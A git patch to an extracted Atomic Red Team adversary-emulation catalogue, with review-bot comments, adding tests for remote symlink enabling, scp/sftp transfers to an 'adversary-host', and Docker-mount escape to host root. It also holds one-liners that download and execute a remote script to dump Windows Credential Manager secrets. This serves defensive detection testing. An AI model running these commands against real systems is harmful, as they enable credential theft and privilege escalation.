From bbef58d0ae5176b747a4f701a987fa5ca9efb914 Mon Sep 17 00:00:00 2001
From: GeoPD
Date: Mon, 25 Nov 2024 05:43:07 +0000
Subject: [PATCH] 2024-11-25 - 11:13 IST - Atomic Red Attack Extraction
---
atomic-red-attacks.csv | 258 ++++++++++++++++++++++++++++++++++++-----
atomic-red-attacks.md | 146 +++++++++++++++++++----
2 files changed, 350 insertions(+), 54 deletions(-)
diff --git a/atomic-red-attacks.csv b/atomic-red-attacks.csv
index ac8e2a4..4fc0895 100644
--- a/atomic-red-attacks.csv
+++ b/atomic-red-attacks.csv
@@ -184,11 +184,25 @@ input_arguments.cert_export.default: /tmp/certs.pem " T1222,File and Directory Permissions Modification,Enable Local and Remote Symbolic Links via fsutil,6c4ac96f-d4fa-44f4-83ca-56d8f4a55c02,"Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) -",windows,,,"fsutil behavior set SymlinkEvaluation R2L:1 +",windows,,,"fsutil behavior set SymlinkEvaluation R2L:1 fsutil behavior set SymlinkEvaluation R2R:1 ",command_prompt,True,,"fsutil behavior set SymlinkEvaluation R2L:0 fsutil behavior set SymlinkEvaluation R2R:0 ",,, +T1222,File and Directory Permissions Modification,Enable Local and Remote Symbolic Links via reg.exe,78bef0d4-57fb-417d-a67a-b75ae02ea3ab,"Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. +[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) +",windows,,,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""1"" /f +reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""1"" /f +",command_prompt,True,,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""0"" /f +reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""0"" /f +",,, +T1222,File and Directory Permissions Modification,Enable Local and Remote Symbolic Links via Powershell,6cd715aa-20ac-4be1-a8f1-dda7bae160bd,"Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. 
This allows access to files from local shortcuts with local or remote paths. +[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) +",windows,,,"New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore +New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore +",powershell,True,,"New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore +New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore +",,, T1207,Rogue Domain Controller,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,"Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) 
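Review bot: The new PowerShell atomic (6cd715aa) can report success without changing anything, because `New-ItemProperty` fails when the key `HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS` does not exist (a policy key that is typically absent until the corresponding GPO has been set) and `-ErrorAction Ignore` hides exactly that failure. Create the key first, e.g. `New-Item -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Force | Out-Null`, and drop `-ErrorAction Ignore` so a failed write is visible to the runner. The cleanup in both new atomics (reg.exe and PowerShell) writes an explicit `0` rather than restoring the prior state; if the values were absent before the test the host is left with a configured value, so `Remove-ItemProperty ... -ErrorAction Ignore` and `reg delete "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /f` would be the closer restore. It is also worth stating in the descriptions that the reg.exe variant writes `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem` while the PowerShell variant writes the Policies key, since a detection keyed on one path will not fire for the other.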
@@ -1164,6 +1178,168 @@ input_arguments.username.type: string input_arguments.username.default: adversary +" +T1105,Ingress Tool Transfer,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,"This test simulates pulling files using SCP on a Windows environment. +",windows,,,"scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} +",powershell,True,,,powershell,"dependencies.0.description: This test requires the `scp` command to be available on the system. + +dependencies.0.prereq_command: if (Get-Command scp -ErrorAction SilentlyContinue) { + Write-Output ""SCP command is available."" + exit 0 +} else { + Write-Output ""SCP command is not available."" + exit 1 +} + +dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client +$capabilityName = ""OpenSSH.Client~~~~0.0.1.0"" +try { + # Install the OpenSSH Client capability + Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop + Write-Host ""OpenSSH Client has been successfully installed."" -ForegroundColor Green +} catch { + # Handle any errors that occur during the installation process + Write-Host ""An error occurred while installing OpenSSH Client: $_"" -ForegroundColor Red +} + +","input_arguments.remote_path.description: Path of folder to pull + +input_arguments.remote_path.type: path + +input_arguments.remote_path.default: /tmp/T1105.txt + +input_arguments.remote_host.description: Remote host to pull from + +input_arguments.remote_host.type: string + +input_arguments.remote_host.default: adversary-host + +input_arguments.local_path.description: Local path to receive files + +input_arguments.local_path.type: path + +input_arguments.local_path.default: C:\temp + +input_arguments.username.description: User account to authenticate on remote host + +input_arguments.username.type: string + +input_arguments.username.default: adversary + +" +T1105,Ingress Tool Transfer,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,"This test 
simulates pushing files using SFTP on a Windows environment. +",windows,,,"# Check if the folder exists, create it if it doesn't +$folderPath = ""#{local_path}"" +if (-Not (Test-Path -Path $folderPath)) { + New-Item -Path $folderPath -ItemType Directory +} +# Create the file +$filePath = Join-Path -Path $folderPath -ChildPath ""#{file_name}"" +New-Item -Path $filePath -ItemType File -Force +Write-Output ""File created: $filePath"" +# Attack command +echo ""put #{local_path}\#{file_name}"" | sftp #{username}@#{remote_host}:#{remote_path} +",powershell,True,,"$filePath = Join-Path -Path ""#{local_path}"" -ChildPath ""#{file_name}"" +Remove-Item -Path $filePath -Force +Write-Output ""File deleted: $filePath"" +",powershell,"dependencies.0.description: This test requires the `sftp` command to be available on the system. + +dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { + Write-Output ""SFTP command is available."" + exit 0 +} else { + Write-Output ""SFTP command is not available."" + exit 1 +} + +dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client +$capabilityName = ""OpenSSH.Client~~~~0.0.1.0"" +try { + # Install the OpenSSH Client capability + Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop + Write-Host ""OpenSSH Client has been successfully installed."" -ForegroundColor Green +} catch { + # Handle any errors that occur during the installation process + Write-Host ""An error occurred while installing OpenSSH Client: $_"" -ForegroundColor Red +} + +","input_arguments.remote_path.description: Path of folder to copy + +input_arguments.remote_path.type: path + +input_arguments.remote_path.default: /tmp + +input_arguments.remote_host.description: Remote host to send + +input_arguments.remote_host.type: string + +input_arguments.remote_host.default: adversary-host + +input_arguments.local_path.description: Local path to receive sftp + +input_arguments.local_path.type: path + 
+input_arguments.local_path.default: C:\temp + +input_arguments.file_name.description: Name of the file to transfer + +input_arguments.file_name.type: string + +input_arguments.file_name.default: T1105.txt + +input_arguments.username.description: User account to authenticate on remote host + +input_arguments.username.type: string + +input_arguments.username.default: adversary + +" +T1105,Ingress Tool Transfer,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,"This test simulates pulling files using SFTP on a Windows environment. +",windows,,,sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path},powershell,True,,,powershell,"dependencies.0.description: This test requires the `sftp` command to be available on the system. + +dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { + Write-Output ""SFTP command is available."" + exit 0 +} else { + Write-Output ""SFTP command is not available."" + exit 1 +} + +dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client +$capabilityName = ""OpenSSH.Client~~~~0.0.1.0"" +try { + # Install the OpenSSH Client capability + Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop + Write-Host ""OpenSSH Client has been successfully installed."" -ForegroundColor Green +} catch { + # Handle any errors that occur during the installation process + Write-Host ""An error occurred while installing OpenSSH Client: $_"" -ForegroundColor Red +} + +","input_arguments.remote_path.description: Path of file to pull + +input_arguments.remote_path.type: path + +input_arguments.remote_path.default: /tmp/T1105.txt + +input_arguments.remote_host.description: Remote host to pull from + +input_arguments.remote_host.type: string + +input_arguments.remote_host.default: adversary-host + +input_arguments.local_path.description: Local path to receive files + +input_arguments.local_path.type: path + +input_arguments.local_path.default: C:\temp + 
+input_arguments.username.description: User account to authenticate on remote host + +input_arguments.username.type: string + +input_arguments.username.default: adversary + " T1006,Direct Volume Access,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,"This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. 
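Review bot: All three new commands (`scp.exe ...`, `sftp.exe ...` and the `echo "put ..." | sftp ...` pipeline) invoke the OpenSSH client with no non-interactive options, so on a first connection to `#{remote_host}` the client stops at the host-key confirmation and then at a password prompt; under a runner with no console the test blocks until its timeout instead of failing with a usable error. Add ssh options to each invocation, e.g. `scp.exe -o StrictHostKeyChecking=accept-new -o BatchMode=yes -o ConnectTimeout=10 #{username}@#{remote_host}:#{remote_path} #{local_path}` (BatchMode presumes key-based auth, which is the only mode that can work unattended; `accept-new` needs OpenSSH 7.6+, which the OpenSSH.Client capability should satisfy but confirm). The scp pull's `remote_path` is described as "Path of folder to pull" while its default is the file `/tmp/T1105.txt` and the command has no `-r`, so either reword it to match the sftp pull's "Path of file to pull" or add `-r`. The scp pull and sftp pull also have no cleanup for the file they drop into `#{local_path}`, unlike the sftp push which removes its artifact.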
@@ -7373,9 +7549,9 @@ dependencies.0.prereq_command: try { dependencies.0.get_prereq_command: Write-Host ""You will need to install Microsoft Word manually to meet this requirement"" ", -T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force ",powershell,False,,,,, -T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force +T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force ",powershell,False,,,,, 
T1555,Credentials from Password Stores,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe,windows,,,"vaultcmd /listcreds:""Windows Credentials"" /all ",powershell,False,,,,, 
@@ -13279,6 +13455,34 @@ input_arguments.listen_port.type: integer input_arguments.listen_port.default: 4444 +" +T1611,Escape to Host,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,"This test demonstrates privilege escalation by abusing Docker's volume mapping +feature to gain access to the host file system. By mounting the root directory +of the host into a Docker container, the attacker can use chroot to operate as +root on the host system. +",containers,,,"echo ""Current user: #{username}"" +sudo -u docker_user sh -c ""sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"" +",sh,True,,"USERNAME=""#{username}""; SUDOERS_FILE=""/etc/sudoers.d/$USERNAME""; id ""$USERNAME"" &>/dev/null && userdel -r ""$USERNAME"" && echo -e ""$USERNAME is deleted.""; [[ -f ""$SUDOERS_FILE"" ]] && rm -f ""$SUDOERS_FILE""; echo ""Cleanup complete."" +",,"dependencies.0.description: Docker +dependencies.0.prereq_command: command -v docker &> /dev/null && echo ""Docker is installed"" || { echo ""Docker is not installed.""; exit 1; } + +dependencies.0.get_prereq_command: echo ""You should install docker manually."" + +dependencies.1.description: Docker Privileged User +dependencies.1.prereq_command: sudo -l -U #{username} | grep ""(ALL) NOPASSWD: /usr/bin/docker"" + +dependencies.1.get_prereq_command: USERNAME=""#{username}"" +PASSWORD=""password123"" +SUDO_COMMAND=""/usr/bin/docker"" +SUDOERS_FILE=""/etc/sudoers.d/$USERNAME"" +[[ $EUID -ne 0 ]] && echo ""Run as root."" && exit 1; id ""$USERNAME"" &>/dev/null || { useradd -m -s /bin/bash ""$USERNAME"" && echo ""$USERNAME:$PASSWORD"" | chpasswd; }; [[ -f ""$SUDOERS_FILE"" ]] || { echo ""$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND"" > ""$SUDOERS_FILE"" && chmod 440 ""$SUDOERS_FILE""; }; echo ""Setup complete. 
User: $USERNAME, Password: $PASSWORD"" + +","input_arguments.username.default: docker_user + +input_arguments.username.description: Username that run attack command + +input_arguments.username.type: string + " T1001.002,Data Obfuscation via Steganography,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,"This atomic test, named ""Steganographic Tarball Embedding"", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) within an image. 
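Review bot: The attack command hardcodes `sudo -u docker_user` while the prereq, the cleanup and the preceding `echo` all use `#{username}`, so overriding the argument creates and later deletes one user but runs the attack as another (and fails outright if `docker_user` does not exist); use `sudo -u "#{username}" sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc alpine chroot /mnt id"`. The `-it` flags are dropped in that line on purpose: `docker run -t` errors with "the input device is not a TTY" when the runner has no terminal, which is the normal case for an automated atomic. The executor is `sh`, but the cleanup and `dependencies.1.get_prereq_command` use `[[ ... ]]`, `&>/dev/null` and `echo -e`; under dash (`/bin/sh` on Debian/Ubuntu) `[[` is a syntax error and `&>` is parsed as `&` plus `>`, which would background `id` and run `userdel -r` unconditionally, so either set the executor to `bash` or use `[ ... ]` and `>/dev/null 2>&1`. Finally, the prereq creates a user with the fixed password `password123` and a NOPASSWD sudo rule for `/usr/bin/docker`, which is root-equivalent and persists if cleanup is skipped; the description should warn about this and the password should be an input argument or generated at run time.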
@@ -21093,68 +21297,64 @@ input_arguments.output-key-file.default: gcp-art-service-account-1.json " T1078.004,Valid Accounts: Cloud Accounts,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,"Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. -",iaas:azure,,,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force -$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd -Connect-AzAccount -Credential $creds -New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} +",iaas:azure,,,"New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} ",powershell,False,,"Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force +Remove-AzAutomationAccount -ResourceGroupName #{resource_group} -Name #{automation_account_name} -Force +Remove-AzResourceGroup -Name #{resource_group} -Force +echo ""Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted."" cd ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" terraform destroy -auto-approve ",powershell,"dependencies.0.description: Check if terraform is installed. dependencies.0.prereq_command: terraform version -dependencies.0.get_prereq_command: echo Please install terraform. +dependencies.0.get_prereq_command: echo ""Please install terraform via https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli (URL accurate as of Nov. 
15, 2024)."" + +dependencies.1.description: Check if Azure CLI and Azure Powershell are installed. -dependencies.1.description: Install-Module -Name Az +* Login to Azure CLI with ""az login"", and login to Azure Powershell with ""Connect-AzAccount"". Sessions are not shared. +* Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI. dependencies.1.prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -dependencies.1.get_prereq_command: Install-Module -Name Az -Scope CurrentUser -Force +dependencies.1.get_prereq_command: $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindowsx64 -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi dependencies.2.description: Check if the user is logged into Azure. -dependencies.2.prereq_command: az account show +dependencies.2.prereq_command: try {if (-not (Get-AzContext)) { exit 1 } else { exit 0 }} catch {exit 1} -dependencies.2.get_prereq_command: echo Configure your Azure account using: az login. +dependencies.2.get_prereq_command: echo ""* Configure your Azure account using: Connect-AzAccount"" dependencies.3.description: Create dependency resources using terraform +* If fail to meet prereq, navigate to T1078.004-2 using ""cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" +* Open the ""terraform.tfvars"" file and fill in the variables with your desired values. 
+* Re-run -GetPrereqs + dependencies.3.prereq_command: try {if (Test-Path ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate"" ){ exit 0 } else {exit 1}} catch {exit 1} -dependencies.3.get_prereq_command: cd ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" +dependencies.3.get_prereq_command: echo ""Navigating to: $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" +cd ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" terraform init terraform apply -auto-approve -","input_arguments.username.description: Azure username - -input_arguments.username.type: string - -input_arguments.username.default: None - -input_arguments.password.description: Azure password - -input_arguments.password.type: string - -input_arguments.password.default: None - -input_arguments.resource_group.description: Name of the resource group +","input_arguments.resource_group.description: Name of the resource group input_arguments.resource_group.type: string -input_arguments.resource_group.default: None +input_arguments.resource_group.default: ART-ResourceGroupName-T1078-004 input_arguments.runbook_name.description: Name of the runbook name input_arguments.runbook_name.type: string -input_arguments.runbook_name.default: None +input_arguments.runbook_name.default: ART-RunbookName-T1078-004 input_arguments.automation_account_name.description: Name of the automation account name input_arguments.automation_account_name.type: string -input_arguments.automation_account_name.default: None +input_arguments.automation_account_name.default: ART-AutomationAccountName-T1078-004 " T1078.004,Valid Accounts: Cloud Accounts,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,"This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team. diff --git a/atomic-red-attacks.md b/atomic-red-attacks.md index 442f617..9477684 100644 --- a/atomic-red-attacks.md 
+++ b/atomic-red-attacks.md 
@@ -83,6 +83,10 @@ | | | | | | | | | | | | | | | | input_arguments.cert_export.default: /tmp/certs.pem | | T1222 | File and Directory Permissions Modification | Enable Local and Remote Symbolic Links via fsutil | 6c4ac96f-d4fa-44f4-83ca-56d8f4a55c02 | Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. | windows | nan | nan | fsutil behavior set SymlinkEvaluation R2L:1 | command_prompt | 1 | nan | fsutil behavior set SymlinkEvaluation R2L:0 | nan | nan | nan | | | | | | [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) | | | | fsutil behavior set SymlinkEvaluation R2R:1 | | | | fsutil behavior set SymlinkEvaluation R2R:0 | | | | +| T1222 | File and Directory Permissions Modification | Enable Local and Remote Symbolic Links via reg.exe | 78bef0d4-57fb-417d-a67a-b75ae02ea3ab | Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. 
| windows | nan | nan | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d "1" /f | command_prompt | 1 | nan | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d "0" /f | nan | nan | nan | +| | | | | [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) | | | | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d "1" /f | | | | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d "0" /f | | | | +| T1222 | File and Directory Permissions Modification | Enable Local and Remote Symbolic Links via Powershell | 6cd715aa-20ac-4be1-a8f1-dda7bae160bd | Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. 
| windows | nan | nan | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore | powershell | 1 | nan | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore | nan | nan | nan | +| | | | | [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) | | | | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore | | | | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore | | | | | T1207 | Rogue Domain Controller | DCShadow (Active Directory) | 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 | Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute. | windows | nan | nan | # starting fake DC server, as SYSTEM (required) | powershell | 1 | nan | Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore | powershell | dependencies.0.description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) | input_arguments.object.description: Targeted object (for machine account do not forget to add final '$') | | | | | | | | | | $dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log" | | | | | | | | | | | | | [DCShadow](https://www.dcshadow.com/) | | | | Remove-Item $dc_output_file -ErrorAction Ignore | | | | | | dependencies.0.prereq_command: $mimikatz_path = cmd /c echo #{mimikatz_path} | input_arguments.object.type: string | 
@@ -640,6 +644,81 @@ | | | | | | | | | | | | | | | | input_arguments.username.type: string | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | input_arguments.username.default: adversary | +| T1105 | Ingress Tool Transfer | Windows pull file using scp.exe | 401667dc-05a6-4da0-a2a7-acfe4819559c | This test simulates pulling files using SCP on a Windows environment. | windows | nan | nan | scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} | powershell | 1 | nan | nan | powershell | dependencies.0.description: This test requires the `scp` command to be available on the system. | input_arguments.remote_path.description: Path of folder to pull | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.prereq_command: if (Get-Command scp -ErrorAction SilentlyContinue) { | input_arguments.remote_path.type: path | +| | | | | | | | | | | | | | | Write-Output "SCP command is available." | | +| | | | | | | | | | | | | | | exit 0 | input_arguments.remote_path.default: /tmp/T1105.txt | +| | | | | | | | | | | | | | | } else { | | +| | | | | | | | | | | | | | | Write-Output "SCP command is not available." 
| input_arguments.remote_host.description: Remote host to pull from | +| | | | | | | | | | | | | | | exit 1 | | +| | | | | | | | | | | | | | | } | input_arguments.remote_host.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client | input_arguments.remote_host.default: adversary-host | +| | | | | | | | | | | | | | | $capabilityName = "OpenSSH.Client~~~~0.0.1.0" | | +| | | | | | | | | | | | | | | try { | input_arguments.local_path.description: Local path to receive files | +| | | | | | | | | | | | | | | # Install the OpenSSH Client capability | | +| | | | | | | | | | | | | | | Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop | input_arguments.local_path.type: path | +| | | | | | | | | | | | | | | Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green | | +| | | | | | | | | | | | | | | } catch { | input_arguments.local_path.default: C:\temp | +| | | | | | | | | | | | | | | # Handle any errors that occur during the installation process | | +| | | | | | | | | | | | | | | Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red | input_arguments.username.description: User account to authenticate on remote host | +| | | | | | | | | | | | | | | } | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.default: adversary | +| T1105 | Ingress Tool Transfer | Windows push file using sftp.exe | 205e676e-0401-4bae-83a5-94b8c5daeb22 | This test simulates pushing files using SFTP on a Windows environment. 
| windows | nan | nan | # Check if the folder exists, create it if it doesn't | powershell | 1 | nan | $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}" | powershell | dependencies.0.description: This test requires the `sftp` command to be available on the system. | input_arguments.remote_path.description: Path of folder to copy | +| | | | | | | | | $folderPath = "#{local_path}" | | | | Remove-Item -Path $filePath -Force | | | | +| | | | | | | | | if (-Not (Test-Path -Path $folderPath)) { | | | | Write-Output "File deleted: $filePath" | | dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { | input_arguments.remote_path.type: path | +| | | | | | | | | New-Item -Path $folderPath -ItemType Directory | | | | | | Write-Output "SFTP command is available." | | +| | | | | | | | | } | | | | | | exit 0 | input_arguments.remote_path.default: /tmp | +| | | | | | | | | # Create the file | | | | | | } else { | | +| | | | | | | | | $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}" | | | | | | Write-Output "SFTP command is not available." 
| input_arguments.remote_host.description: Remote host to send | +| | | | | | | | | New-Item -Path $filePath -ItemType File -Force | | | | | | exit 1 | | +| | | | | | | | | Write-Output "File created: $filePath" | | | | | | } | input_arguments.remote_host.type: string | +| | | | | | | | | # Attack command | | | | | | | | +| | | | | | | | | echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path} | | | | | | dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client | input_arguments.remote_host.default: adversary-host | +| | | | | | | | | | | | | | | $capabilityName = "OpenSSH.Client~~~~0.0.1.0" | | +| | | | | | | | | | | | | | | try { | input_arguments.local_path.description: Local path to receive sftp | +| | | | | | | | | | | | | | | # Install the OpenSSH Client capability | | +| | | | | | | | | | | | | | | Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop | input_arguments.local_path.type: path | +| | | | | | | | | | | | | | | Write-Host "OpenSSH Client has been successfully installed." 
